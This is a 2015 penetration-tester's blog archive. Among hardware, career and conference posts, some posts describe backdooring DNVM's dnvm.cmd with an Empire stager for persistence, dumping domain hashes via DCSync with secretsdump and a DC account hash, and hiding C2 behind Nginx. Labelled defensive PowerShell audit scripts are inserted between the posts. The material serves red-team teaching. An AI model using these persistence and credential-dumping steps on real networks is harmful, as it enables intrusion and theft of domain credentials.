
Thursday, December 31, 2015

Reverse Proxying Attacker Tools

Ever want to have all of your C2 go to the same box, have the functionality of Meterpreter and Empire, and make it so that if anyone browses to the actual site of your C2 all they get is something like Google?

Nginx makes that possible, and instead of making a blog post that will disappear, I'll point you at my combo in my "Attacker Knowledge Base" site:

https://attackerkb.com/Combinations/ReverseProxyAttackTools

and instead, show you the results once it's setup:

Metasploit:



Empire:
 

And this is what happens if "they" try and use Google:


Sunday, December 27, 2015

Automating PowerShell Empire Install

PowerShell Empire is an excellent tool and can outperform Metasploit in a few crucial ways simply because it's using Windows' native scripting language, PowerShell. To this end, it is nice to have it installed and set up on attack boxes from Raspberry Pis to PwnPlugs to Kali boxes. Here is how to do it manually; in another post I will show you how to make this much more automated:

First you want to take care of installing all of the dependencies by going to their install.sh script and installing pip and the other python packages needed for your installation. (See here https://github.com/PowerShellEmpire/Empire/blob/master/setup/install.sh )
Next, simply clone the repo:

root@wpad:~# git clone https://github.com/powershellempire/empire
Cloning into 'empire'...
remote: Counting objects: 1988, done.
remote: Compressing objects: 100% (58/58), done.
remote: Total 1988 (delta 30), reused 0 (delta 0), pack-reused 1930
Receiving objects: 100% (1988/1988), 5.55 MiB | 357.00 KiB/s, done.
Resolving deltas: 100% (1159/1159), done.
Checking connectivity... done.

CD into the empire/setup directory and run the "./install.sh" script with the temporary environment variable "STAGING_KEY" set. You can make it equal whatever you wish, or simply pick "RANDOM" and it will automatically select a long, random password for you.

root@wpad:~# cd empire/setup
root@wpad:~/empire/setup# STAGING_KEY=RANDOM ./install.sh
Reading package lists... Done
Building dependency tree
Reading state information... Done
python-dev is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Reading package lists... Done
Building dependency tree
Reading state information... Done
python-m2crypto is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Reading package lists... Done
Building dependency tree
Reading state information... Done
swig is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Reading package lists... Done
Building dependency tree
Reading state information... Done
python-pip is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Requirement already satisfied (use --upgrade to upgrade): pycrypto in /usr/lib/python2.7/dist-packages
Cleaning up...
Requirement already satisfied (use --upgrade to upgrade): iptools in /usr/local/lib/python2.7/dist-packages
Cleaning up...
Requirement already satisfied (use --upgrade to upgrade): pydispatcher in /usr/local/lib/python2.7/dist-packages
Cleaning up...
[*] Database setup completed!
[*] Certificate written to ../data/empire.pem
[*] Setup complete!

The thing I like about doing the “./install.sh” instead of just doing the database setup is that it double checks to make sure that you have all the dependencies correct and creates a certificate for you.

Wednesday, November 18, 2015

Intel NUC Super Server

Hi. I'm Rob... and I have a problem. Let's just say, when you find the limitations on Amazon's wishlist features for single items, you know you have a problem. My problem? I'm kinda addicted to Intel NUCs. They are so versatile, low-ish power consumption, and incredibly powerful and TINY. I carry 3 of these (the older / cheaper ones) around to run my trainings / classes from.

The following is my current wishlist. It is an i7 NUC w/ 500GB of high speed M2 SSD, plus a 1TB SATA SSD, and 32 GB of RAM... ya, that's right, 1.5 TB of SSD space and 32 gigs of RAM!!

Intel NUC Kit NUC5i7RYH Barebone System
Samsung 850 EVO 500 GB M.2 3.5-Inch SSD (MZ-N5E500BW)
Samsung 850 EVO 1 TB 2.5-Inch SATA III Internal SSD (MZ-75E1T0B/AM)
Crucial 1600 MT/s (PC3L-12800) CL11 SODIMM 204-Pin Memory CT204864BF160B
Total Cost: 1328.28

I have gone back and forth between virtualization software (ESXi and Xen mostly).

Xen works out of the box but only has a decent interface in its Windows GUI. OpenXenManager for Linux is ok, and Xen Orchestrator (Web UI) leaves a bit to be desired. If you're ok with keeping a Windows box around, Xen is the superior choice when it comes to feature sets (mainly clone and templating out of the gate, and free).

If you do go the ESXi route follow steps here: https://www.virten.net/2015/03/esxi-6-0-image-for-intel-nuc/ because it doesn't work out of the box. I did create the ISO already, so if you want to use the one I made you can find it here: https://dl.dropboxusercontent.com/u/2627512/ESXi-6.0.0.update01-3073146-NUC.iso

You may run into the Manufacturer and Model being random strings (question marks in diamonds), but you can follow: http://www.virten.net/2015/02/how-to-install-esxi-on-5th-gen-intel-nuc-nic-and-ahci-workaround/

Again, I've already done these steps so you can download the pre-built BIOS rom here: https://dl.dropboxusercontent.com/u/2627512/RY0350-FIXED.bio - WARNING: I doubt the BIOS is universal so if you don't buy the NUC listed above, you probably want to just follow the steps yourself. Flashing a BIOS with the wrong ROM could brick the device.



Monday, November 02, 2015

Meterpreter show_mount

Meterpreter’s STDAPI extension (the one that always gets loaded) has a new command. This doesn’t happen very often so it’s worth noting.

The new command prints out the currently attached "mounts". In the Windows world, that means the normal CD-ROM, C drive, etc., but it also means all of the mounted network drives as well.

This gets very interesting when you happen to find yourself in a VM environment where you can start writing files to the host:
meterpreter > show_mount
Mounts / Drives
===============
Name Type       Size (Total) Size (Free) Mapped to
---- ----       ------------ ----------- ---------
A:\ removable      0.00 B      0.00 B
C:\ fixed         59.90 GiB   28.15 GiB
D:\ cdrom          0.00 B      0.00 B
Z:\ remote        64.78 GiB   18.09 GiB  \\vmware-host\Shared Folders\


I’ll leave the rest up to your imagination for now. But we will come back to this very soon. Huge thanks to @TheColonial - OJ for implementing this much needed option. Merged pull request is here: https://github.com/rapid7/metasploit-framework/pull/6146

Thursday, October 29, 2015

Time

Time is a one-time non-renewable precious resource you are given. It is ok to be greedy, selective, and even snobbish about how, and with whom you spend it.
 
If it helps, think of your time as a vault: money is withdrawn at a constant rate by people as you spend it, but you are not allowed to look inside to see how much you have left. It could be a billion dollars, it could be .25 cents. If it were money, who would you spend it on if that were the case? Most likely you would be more cautious about who and what you spent any amount on. (This is not to say you should live as a hermit, but pushing you to actively choose what you want instead of letting life happen and spending your resource.)
 
Also, respect others' choice to spend their time with you. I know we don't always acknowledge it, but we should be a bit more cognizant of it.
 
We actually dismiss it nonchalantly, in English, with simple phrasing changes like "Thank you for spending THE time". When we should probably say "Thank you for spending YOUR time". I have heard it both ways and much more the latter, but it just struck me as I was writing the close to this blog post that I was about to do what I had just warned against.
 
So, in closing, thank you for spending your precious moments reading my blog.
 
Rob

Wednesday, October 14, 2015

R5 Industries

I recently took the plunge and joined a startup called R5 Industries. I wanted to say thanks for all the well wishes that I received on social media. It has certainly calmed my nerves about the choice ;-).

I've had a number of people ask what R5 Industries does. Our primary selling point is AntigenC2, which is really a Command and Control detection product (no agents). But we also do Red Team assessments and some other fun toys; if you are interested, contact@r5industries.com

More info here: http://r5industries.com/

And that's the end and last sales pitch you'll get from me on the subject.

Why did I make the move?

1. While I loved life as an internal Red Team member (highly recommended; if you need reasons why, make sure you watch Chris Gates' talk at RuxCon: https://ruxcon.org.au/speakers/#Chris Gates ) where I got to help steer the boat of a Fortune 10 company, I had a number of opportunities that I had to turn down because of it, even though my higher-ups went above and beyond to give me as much latitude as possible.

2. I had a bunch of crazy project ideas that I wanted to see come to life over the years, I don't think I would have ever had the time to see them become anything more than mythical ideas without this opportunity.

So, wish me luck, send me work (as I can finally accept it ;-) [through R5 of course]) and look out for some pretty wacky ideas and products that I've been talking about for years.

Thanks again, I wouldn't be here without you.
Rob

Monday, October 05, 2015

DotNet's DNVM for Persistence on Developer Machines

One of the best resources for persistence mechanisms is Hexacorn's blog.

If you haven't checked out his "Beyond good ol' Run key" (linked above) 32 post series, you really should. But today I wanted to talk about one that I didn't see up there:

DNVM (https://github.com/aspnet/dnvm) is the DotNet Version Manager and it's a part of ASP.NET 5, which I believe has been inside of Visual Studio since the 2013 version. It's there to help specify which runtime to use for applications, much like RVM (Ruby Version Manager) does for Ruby. Their goal is that you can install .NET and run .NET applications on Linux and Mac as well, using DNVM.

Once installed it adds a "DNX_HOME" environmental variable:

 Inside the folder specified are 3 directories:


There are plenty of things to play with in here, but I wanted to specifically point out that the BIN directory is put into the $PATH variable (as well as two others)

C:\WINDOWS\system32\config\systemprofile\.dnx\bin (DOES NOT EXIST BY DEFAULT)
C:\Program Files\Microsoft DNX\Dnvm\
C:\Users\mubix\.dnx\bin

Ok, not a big deal right? Even a user under UAC can edit their own $PATH variable (we'll come back to that in another post).

Let's take a look at what is in those folders:


Interesting, why don't we see what the command dnvm does:


Seriously... I probably don't even have to continue at this point...

But, if I run dnvm from the command prompt (as a developer would) it runs it from inside that protected directory in Program Files right?... RIGHT?! Nope..

Edit the dnvm.cmd with a bit of PowerShell Empire stager (minus the -W Hidden, because we need the user to actually get the output of the dnvm command) and....

[+] Initial agent UU2YKZ3VDG2AUKFY from 192.168.1.109 now active

Boom!

Let's look a bit into how DNVM works to see if there is something juicier there (way too much for a single blog post):


Awesome! So I can modify things in the runtime directory; let's look in there:


Lots of fun, but we still have to wait until they run some C# code with that runtime and guess which one they will use (or backdoor all of them). I would rather just make a modification to the dnvm.cmd and be done with it. Simple and clean.

Oh did I mention that this is used to cross compile binaries? Ya, oh ok, so you can infect the built binaries, or web apps for Windows, Linux and OSX...

Oh and one other thing caught my eye while I was looking into the DNVM.ps1 script:


Have fun!

P.S. Unquoted paths FTW: https://github.com/aspnet/dnvm/pull/357
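The defender-side version of the PATH observation above, added here and not part of the original post: walk every PATH entry and report the ones that don't exist yet (like the systemprofile one listed above) or that a low-privileged principal can write to. It assumes Windows PowerShell 5.1 or later and nothing else.

```powershell
# Added example (not from the original post): audit the PATH for directories a
# low-privileged principal could write to, or that do not exist yet and so could
# be created by whoever can write the nearest existing parent. Assumes PowerShell 5.1+.

function Get-WritablePathEntries {
    param(
        # Principals treated as "anyone on the box". The current user is included on
        # purpose: a per-user PATH entry such as %USERPROFILE%\.dnx\bin is writable by design.
        [string[]]$LowPrivPrincipals = @('Everyone', 'BUILTIN\Users',
                                          'NT AUTHORITY\Authenticated Users',
                                          "$env:USERDOMAIN\$env:USERNAME")
    )
    # Rights that let someone create or replace a file inside the directory.
    $writeMask = [System.Security.AccessControl.FileSystemRights]::CreateFiles -bor
                 [System.Security.AccessControl.FileSystemRights]::AppendData -bor
                 [System.Security.AccessControl.FileSystemRights]::Write

    foreach ($entry in ($env:PATH -split ';')) {
        $dir = $entry.Trim().Trim('"')
        if (-not $dir) { continue }
        $exists = Test-Path -LiteralPath $dir -PathType Container

        # For a missing entry, check the closest ancestor that does exist instead.
        $target = $dir
        while (-not (Test-Path -LiteralPath $target -PathType Container)) {
            $parent = Split-Path -Parent $target
            if (-not $parent -or $parent -eq $target) { break }
            $target = $parent
        }

        $writers = @()
        try {
            foreach ($ace in (Get-Acl -LiteralPath $target).Access) {
                if ($ace.AccessControlType -ne 'Allow') { continue }
                # Generic rights (e.g. GENERIC_ALL) are not decoded here, so the check is conservative.
                if (($ace.FileSystemRights -band $writeMask) -eq 0) { continue }
                if ($LowPrivPrincipals -contains $ace.IdentityReference.Value) {
                    $writers += $ace.IdentityReference.Value
                }
            }
        } catch {
            # An unreadable ACL is reported rather than silently treated as safe.
            $writers += "ACL unreadable: $($_.Exception.Message)"
        }

        [pscustomobject]@{
            Directory      = $dir
            Exists         = $exists
            CheckedPath    = $target
            LowPrivWriters = ($writers | Sort-Object -Unique) -join ', '
        }
    }
}

# Only the interesting rows: missing directories, or ones a low-priv principal can write to.
Get-WritablePathEntries | Where-Object { -not $_.Exists -or $_.LowPrivWriters } |
    Format-Table -AutoSize
```

Run it as the developer account, not as an administrator, since the point is what that user's PATH resolves to.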

Thursday, October 01, 2015

Hiding desktop icons for presentations on OSX

If you found this post via a search, you are probably like me, "not great" at keeping your desktop clear of "stuff" (you probably have a 'stuff' folder you once put stuff in and forgot about).

If you are, and you go into a presentation, you probably don't want to have all of your icons visible (and possibly recorded).  Hiding your desktop icons on Windows (since 7 I believe) is pretty simple. 



On OSX, it's not as straightforward. Following a tip I found here: http://hints.macworld.com/article.php?story=20100804092806364 I was able to create a keyboard shortcut to hide, or unhide, everything.

First, open up "Automator" and create a new document / "Service" 


Then drag and drop "Run AppleScript" from the Utilities section:


Next, make sure it says that the service doesn't accept input from any application:

Paste in the following script:

on run {input, parameters}
	-- read the current value (true = icons shown); this fails if the key has never been set
	set myAnswer to (do shell script "defaults read com.apple.finder CreateDesktop") as boolean
	-- flip it
	do shell script "defaults write com.apple.finder CreateDesktop " & ((not myAnswer) as string)
	-- restart Finder so the change takes effect
	do shell script "killall Finder"
end run

On the first run, you may get an error stating that the variable doesn't exist or that it couldn't convert it into a boolean. This is because by default this variable doesn't exist for new users. All you have to do to correct this is open a terminal and type:

defaults write com.apple.finder CreateDesktop true

To set it for the first time:
Back in Automator, re-do the test run of the script:

Save the file and then you can set up a keyboard shortcut in System Preferences:

Hit Control+Cmd+H to your heart's content.



Thursday, September 24, 2015

Hacking Advice for @krystropolis

Today I was asked by @Krystropolis for a "Hello" and maybe some hacking advice, see tweet:

I thought about it on my entire 1 hour drive home from just turning in my badge and laptop from a big corporation to go work at a start up. I thought about talking about ethics and data handling, to Geo-politics. I mean, what kind of hacking are we talking about.

I finally ended up thinking about what would have been the best advice for me, growing up, for "how to learn hacking", and I boiled it down right before I pulled into my driveway to two words: "Build It". For me personally, I didn't start to really understand attackers, attacks, or even simple defense strategies until I started to try to build it myself.

For many hackers (and mechanics, my father included) they started by taking things apart first, then putting them back together (usually with a few extra screws or parts that "didn't matter" on the side). But for me, I learned best by building from scratch. This went from stealing RAM from the "old junk" computer locker at my high school to upgrade my Mom's 95 MHz Pentium (OH YA!) - in my defense, the computer science teacher told me that I could take anything I needed to build a computer and he didn't specify the physical location that computer had to be in - all the way to working on the sensor grid for the Marine Corps networks when I helped at the MARCERT as a level 1 tech. I even convinced a few of the Hak5 crew at the time to let me build Gentoo (Stage 3 baby!) on their laptops because it was tons faster (once everything compiled 10 years later).

Man do I ramble. Point is: if you want to learn hacking, or how to hack, you need to know a system inside and out first. System (noun) in its most basic sense. The best penetration testers / hackers I have ever known are the ones that have rebuilt their labs/phone/widget for the 500th time.

UPDATE: I have had a few comments, about the post already. But what I forgot to point out is that by building a system or network you not only get to know the ins and outs of how it works, and what shortcuts you had to take to get it to actually work, but also the appreciation of what it took for you to build it, the hours/research that went into it, how it connects to other systems and clients, and finally what kind of business impact it could or does have on actual corporations. These are core skills to be an effective communicator of risk and need, while keeping compassion for the requirements and business impact. Highly sought after skills in the job market.

I hope this helps.
Rob

Wednesday, September 16, 2015

Get PasswordLastSet time for Domain Controller accounts

AKA - ROB WRITES POWERSHELL!!

Yesterday I posted a way to dump hashes using a Domain Controller account. But how do you know which account to use? And when was its password last set? net user unfortunately won't do computer accounts.

So I decided to write a PowerShell script to find out. Unfortunately Windows 7 doesn't come with the ActiveDirectory PowerShell module (I'm sure there is another way to do this, but here is how I did it).

Installed the Remote Server Administration Tools - http://blogs.msdn.com/b/rkramesh/archive/2012/01/17/how-to-add-active-directory-module-in-powershell-in-windows-7.aspx (Not stealthy)

Then I was able to use the following janky script I wrote to find all of the PasswordLastSet values for all of the Domain Controllers:

Import-Module ActiveDirectory

# Every DC that is also a Global Catalog (swap in -Filter * to include non-GC DCs)
$dclist = Get-ADDomainController -Filter { isGlobalCatalog -eq $true } | Select-Object Name

Foreach ($dc in $dclist)
{
    # PasswordLastSet is not returned by default, so ask for it explicitly
    $lastset = Get-ADComputer $dc.Name -property PasswordLastSet
    Write-Host "$($dc.Name) - $($lastset.PasswordLastSet)"
}

This would probably be an awesome recon / situational awareness module for Empire ( https://github.com/PowerShellEmpire/Empire ) but written better hopefully.

Output is pretty simple, it looks like this:

DC1 - 09/15/2015 07:05:40

Now I know that I have about 29 days left of valid use of that hash.
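The arithmetic behind that "29 days", carried through for every DC, as an added example that is not the post's own script. It assumes the default 30-day machine-account password age; when RSAT's ActiveDirectory module is not present it falls back to constructed sample records so it runs offline.

```powershell
# Added example (not the post's own script): work out how old each Domain Controller's
# machine-account password is and how many days remain before the default 30-day
# rotation, flagging any that are overdue. The machine rotates its own password via
# Netlogon once it passes MaximumPasswordAge; the DC does not expire it, so "overdue"
# means rotation is disabled on that host or the host has been offline.

function Get-DcPasswordAge {
    param(
        [Parameter(Mandatory)] [object[]]$Computers,  # objects with Name and PasswordLastSet
        [int]$MaxAgeDays = 30,                          # Windows 2000+ default (KB154501)
        [datetime]$Now = (Get-Date)
    )
    foreach ($c in $Computers) {
        if (-not $c.PasswordLastSet) {
            [pscustomobject]@{
                Name              = $c.Name
                PasswordLastSet   = $null
                AgeDays           = $null
                DaysUntilRotation = $null
                Status            = 'PasswordLastSet missing'
            }
            continue
        }
        $ageDays = [int][math]::Floor(($Now - [datetime]$c.PasswordLastSet).TotalDays)
        $left    = $MaxAgeDays - $ageDays
        $status  = 'ok'
        if ($left -le 3) { $status = 'rotates within 3 days' }
        if ($left -lt 0) { $status = 'OVERDUE: rotation disabled or host offline' }
        [pscustomobject]@{
            Name              = $c.Name
            PasswordLastSet   = [datetime]$c.PasswordLastSet
            AgeDays           = $ageDays
            DaysUntilRotation = $left
            Status            = $status
        }
    }
}

# Use live data when RSAT's ActiveDirectory module is available (as in the post);
# otherwise fall back to constructed sample records so the function still runs.
if (Get-Module -ListAvailable -Name ActiveDirectory) {
    Import-Module ActiveDirectory
    $dcs = Get-ADDomainController -Filter * |
           ForEach-Object { Get-ADComputer $_.Name -Properties PasswordLastSet }
    $now = Get-Date
} else {
    $dcs = @(
        [pscustomobject]@{ Name = 'DC1'; PasswordLastSet = [datetime]'2015-09-15 07:05:40' }  # constructed
        [pscustomobject]@{ Name = 'DC2'; PasswordLastSet = [datetime]'2015-07-20 02:00:00' }  # constructed, overdue
    )
    $now = [datetime]'2015-09-16 12:00:00'                                                     # constructed
}

Get-DcPasswordAge -Computers $dcs -Now $now | Format-Table -AutoSize
```

With the constructed records DC1 comes out at 29 days remaining, matching the post, and DC2 is reported as overdue.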

Tuesday, September 15, 2015

Using Domain Controller Account Passwords to HashDump Domains

Since I follow both +Carlos Perez and +Benjamin Delpy on Twitter, something caught my eye on August 2nd, soon after +Benjamin Delpy drops DCSync:

And then later on August 28th, again about the DC$ account (Domain Controller computer account):

Because DCSync is calling on "sync" based APIs of Active Directory, that are, by default, used only by Domain Controllers, all Domain Controller computer accounts would have the ability to do this as well as the Domain/Enterprise Admins.
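The defender-side check this implies, added here and not part of the original post: list every principal that holds the directory replication extended rights on the domain naming context, which is exactly the set that can replicate secrets this way. It assumes RSAT (the ActiveDirectory module and its AD: drive); the two GUIDs are the schema's DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights.

```powershell
# Added example (not from the original post): who holds the replication extended
# rights on the domain NC. Expect the Domain Controllers, Enterprise/Domain Admins
# and the DC groups; anything else is worth a conversation. Assumes RSAT.
Import-Module ActiveDirectory

# Extended-right GUIDs from the AD schema. Get-Changes-All is the one that returns secrets.
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
}
# An ExtendedRight ACE with an all-zero ObjectType grants every extended right.
$AllExtendedRights = '00000000-0000-0000-0000-000000000000'

function Get-ReplicationRightHolders {
    param([string]$DomainDN = (Get-ADDomain).DistinguishedName)

    $acl = Get-Acl -Path "AD:\$DomainDN"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $guid = $ace.ObjectType.ToString()
        $hasExtended   = (($ace.ActiveDirectoryRights -band
                           [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight) -ne 0)
        $hasGenericAll = (($ace.ActiveDirectoryRights -band
                           [System.DirectoryServices.ActiveDirectoryRights]::GenericAll) -eq
                           [System.DirectoryServices.ActiveDirectoryRights]::GenericAll)

        # Most specific match last wins, so GenericAll overrides the others in the label.
        $right = $null
        if ($hasExtended -and $ReplicationRights.ContainsKey($guid)) { $right = $ReplicationRights[$guid] }
        if ($hasExtended -and $guid -eq $AllExtendedRights)          { $right = 'all extended rights' }
        if ($hasGenericAll)                                            { $right = 'GenericAll (covers replication rights)' }

        if ($right) {
            [pscustomobject]@{
                Identity  = $ace.IdentityReference.Value
                Right     = $right
                Inherited = $ace.IsInherited
            }
        }
    }
}

Get-ReplicationRightHolders | Sort-Object Identity, Right | Format-Table -AutoSize
```

Any identity in that output that is not a DC, a DC group or a Domain/Enterprise Admin is an account that could pull hashes the same way the DC$ account can.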

Anyone who's ever administered an Active Directory, knows that computer accounts change their passwords automatically. How often do they change them?

https://support.microsoft.com/en-us/kb/154501
Machine account passwords are regularly changed for security purposes. By default, on Windows NT-based computers, the machine account password automatically changes every seven days. Starting with Windows 2000-based computers, the machine account password automatically changes every 30 days
PSSSST!! That article is about how to DISABLE automatic password changing

Alright. So, I'm not going to go into "how" to get the hashes for a computer account, but if you've ever dumped passwords before, the computer accounts are the ones with the "$" on the end. Find the ones that are domain controllers, match up the hashes, and use Impacket's secretsdump.py to your heart's content. (Or until the password changes for that DC, then you use another one to dump it again, oh, did I not mention that computers don't change their passwords all at the same time in that 30 day window?)

Remember, Domain Controller accounts don't have a lot of other permissions, so you need to use the "-just-dc" option in secretsdump in order for it to do only the domain dump:

python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc LAB/DC2k8_1\$@172.16.102.15

Impacket v0.9.14-dev - Copyright 2002-2015 Core Security Technologies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Happy #HackersDay


Monday, September 14, 2015

2015 DerbyCon Hiring


It's often tough for both those hiring and job hunters to find one another at conferences. I think this is mostly because of a couple of things.

  1. No one wants to stand at a booth on either side and talk job stuff in front of a bunch of people, and people at booths rarely get the chance to get away.
  2. It’s hard to know “who” to talk to.

So I created a very simple Google doc to help put twitter handles and links together for people who are job hunting and people who are hiring to kinda get to know who to talk to.

Got more to add? Please let me know and I'll get it added, or simply make a comment on the Google doc with the info to add.

For reference on how this works, see the 2015 ShmooCon list

Link to the google doc: https://docs.google.com/spreadsheets/d/16TyaalxEilYN_QKIP3GxBMyQ2Kw8YYIj9_j-rgzLiFc


Thursday, September 10, 2015

Tres Lessons from Pied Piper Delete Key Hack

The teflon crew at Pied Piper suffered quite a bit during Season 2 of SILICON VALLEY. But there was no greater indignity than being brought to their knees by a tequila bottle.

Since episode eight “White Hat/Black Hat” aired, many skeptical viewers have asked: how could something like this happen?

Could a mindless error of pressing a delete key really cause a venerable company like Intersite to lose over nine thousand hours of content (including an irreplaceable archive of vintage yiffing videos)?

The short answer: yes.

When the producers of SILICON VALLEY reached out to me during the writing of the episode to help design the sequence, I knew it would be tough to make the technical intricacies track for the joke. But if the team had figured out optimal tip-to-tip of efficiency with Stanford PhDs, I was up for the challenge.

The delete key hack is a perfect storm of bad system hygiene. The dozens of small errors that led to it are more common than most systems administrators care to admit.

There’s a lesson here. Away from the big headlines about hacks at Sony Pictures and Target, companies every day have their systems broken by stupid errors. Most as avoidable as not putting a tequila bottle on a laptop (or letting Russ Hanneman inside your home in the first place).

Below is the post-mortem on how the hack went down and tres lessons we can learn from it.



The Bake-Off


Intersite set up the bake-off between Endframe and Pied Piper by providing access to an FTP server with the target files. Each company then downloads the individual files, encodes, compresses and roundtrips the file back to the Intersite server.

To speed up the process of the compression, the companies sequentially encode each file to save hard drive space and time waiting for them all to copy down, then they perform the operation.

This is where all the problems originate: to deliver the compressed file, Pied Piper was given full permission to Intersite’s FTP server (because of course it’s easier to just give all permissions than manage every folder’s permissions).

For those interested, the final Pied Piper solution for Intersite would look something like this:

The Hack


When Russ sets down the Tres Comas tequila bottle on Richard’s laptop he unwittingly initiates a massive delete sequence on Intersite’s server. Here are the steps:

  1. Richard navigates to bake-off directory or with the extended permissions he got into a parent folder with original content.
  2. Gilfoyle turns off the delete verification prompts in the custom software they used for the file transfer and conversion. Richard meanwhile has enabled CRC checking on the internet system, a protection measure for penetration into Pied Piper that backfires.
  3. Russ Hanneman arrives with the Tres Comas Tequila and mistakenly sets the bottle down on the keyboard initiating a delete command. Chaos ensues.
  4. As the delete sequence launches the large file size of video spins the disks at 100% and locks the system.
  5. Hands-on access with the bottle with the persistent delete requests plus the CRC checking creates fork bomb-like effects where the Pied Piper team cannot get back into the system to stop the delete sequence. Intersite is compromised and thousands of hours of video are deleted.

Tres Issues



A myriad of problems contributed to the delete key hack. Using the OWASP framework here are the top tres issues:

A7 - Missing Function Level Access Control “PITA Administration”
Intersite’s FTP server is set up to allow the bake-off users full permissions to the digital masters being used in the bake-off.

But why were they unable to kill the transfer? There are a bunch of reasons this could happen -- the SAN of which they were FTP’ed into was doing massive amounts of data deletion which can be HDD intensive (try deleting over 9000 files and watch your computer crawl).

But they would still be able to kill it on the Pied Piper end?! Not if the transfer agent was queuing up deletes as fast as it could, pegging out the server on the Pied Piper end as well. Remember, everything they had in their garage data center was going into making the conversions go as fast as possible, the transfer back was a lower priority.

A4 - Insecure Direct Object Reference “speed is everything”
By not locking out his screen and letting Russ Hanneman near his unsecured session where he was monitoring the transfer from, Richard allowed direct access to the “delete” key object.

But why didn’t it prompt for approving the delete? Basically when you’re in a bake-off like this, you do absolutely everything to remove any possible obstacles, like ANY prompts or approvals that you might not be around to hit “OK” on.

A6 - Sensitive Data Exposure “We must run forward simply to stay in place”
Intersite did not do a proper backup of their files due to cost and size constraints on their current system. In Episode 7 “Adult Content,” Molly Kendall, Intersite’s CEO, talked about how the porn industry was barely making the bills due to “free” internet porn influx. Intersite was doing its best to stay afloat in its industry and, as such, cut corners not only in the lack of proper admin for their FTP server, but also in storage costs. A mistake they will probably not make again soon.

Tres Lessons


Don’t be an idiot with permissions:
The easiest way in is through the front door. Ensure that everyone is on a need-to-know basis with data. Standard protections like 2-factor authentication and whitelisting IP addresses mean nothing if the wrong people access sensitive information.

Back up your data:
It’s easy to take for granted but reliable storage is still expensive. Most small businesses don’t backup data on a daily basis. Even fewer do so with any form of redundancy or integrity checks.

Don’t work with assholes:
Insider attacks are the hardest to detect and protect against. Surveys estimate 59% go unnoticed until it is too late. The first line of defense is common sense, only hire people you trust — and definitely not anyone who put radio on the Internet.


Monday, September 07, 2015

Back to Blogger

I've had my fair share of "trying new things" after SquareSpace. I tried Ghost, Octopress, Wordpress, and about 30 others in between. All the blogging platforms I tried had some major issues that I didn't like. I'm sure at some point I'll write about them, but this post is mostly just to announce I _finally_ have given up the fight for finding the perfect blogging platform and I'm just going to blog on Blogger from now on. One of the main reasons for just giving in was the fact that I noticed that because I was doing a conversion of 500+ blog posts every time I wanted to switch platforms, I was constantly "not in the mood" to blog, which kinda negates the whole purpose of finding a new platform. Anywho, rant over. I should be back on the clock now, hopefully bringing cool stuff here in the weeks and months to come.

Sunday, February 15, 2015

pfSense Without Internets

A while back I needed to set up a pfSense box for CTF/example stuff that didn't and wouldn't ever have Internet connectivity. Doesn't seem like much of a task, right? Just pop it in and go. Problem is that you lose the use of the packages that help make pfSense so awesome.

Once I figured it out at that time, I made a Forum post so that anyone running into the same issue wouldn’t have to struggle as much:

https://forum.pfsense.org/index.php?topic=55504.0

Most things never disappear from the Internet, but I was looking for an old forum post I had bookmarked regarding some persistence methods and noticed it was no longer there, since the forum owner had gotten rid of the forum as too much hassle. I get it, but when I went to Archive.org to get the saved copy, they didn't have one. So this is what this post is for: to save that content just in case it disappears.

Also, here is a bug report for the “issue” (been open since 2012):

http://redmine.pfsense.org/issues/2586

If you are following:

http://doc.pfsense.org/index.php/Creating_Your_Own_Package_Repository

and you are getting:
Unable to communicate with 192.168.1.100 Please verify DNS and interface configuration, and that pfSense has functional Internet connectivity.
because you are using the repo to enable an offline (non-Internet-connected) host to be able to utilize packages, all you have to do is:

1. Go into Services –> DNS Forwarder and add a Host Override

Host: www
Domain: pfsense.org
IP Address: 127.0.0.1
Description: null routed record to enable offline repo

Then make sure you have the IP or hostname of your package repository web server in the /pkg_mgr_settings.php (on 2.0, follow the guidelines on the doc above for older versions). After that you should be good to go. Of course this is barring any Firewall blockages you might have in place so be sure to test connectivity from the pfSense box to the web server.

So, that was just the beginning, it’s actually better to not null-route it but make the following entries:

files.pfsense.org - 192.168.1.100
files.pfsense.com - 192.168.1.100
www.pfsense.org - 192.168.1.100
www.pfsense.com - 192.168.1.100

If your package web server is 192.168.1.100. Next is the problem of not having the packages themselves. So wget -mk -np http://files.pfsense.org/packages/ gave me a directory that I plopped into my already existent packages directory (created from the git clone as described in the documentation) but the problem I ran into was the php files being rendered still (which made any packages that pulled php files get the rendered version instead of source).

So you need to add a .htaccess file in the packages directory with the following:

RemoveHandler .php .phtml .php3
RemoveType .php .phtml .php3
php_flag engine off

Make sure that AllowOverride all is enabled if you are running Apache to host the package site; if not, you'll have to google how to allow .htaccess files for your particular server (or, if your server doesn't support htaccess files, how to enable source disclosure).

After those alterations I seem to be off to the races for the most part. Some packages pull from other websites, but altering the package_8.xml or just rerouting the dns seems to solve most of those issues.

Tuesday, January 13, 2015

2015 ShmooCon Hiring

It’s often tough for both hiring managers and job hunters to find one another at conferences. I think this is mostly because of a couple of things:

1. No one wants to stand at a booth on either side and talk job stuff in front of a bunch of people, and people at booths rarely get the chance to get away.
2. It’s hard to know “who” to talk to.

So I created a very simple Google doc to put Twitter handles and links together for people who are job hunting and people who are hiring, so each side gets a sense of who to talk to.

Got more to add? Please let me know and I’ll get it added, or simply make a comment on the Google doc with the info to add.



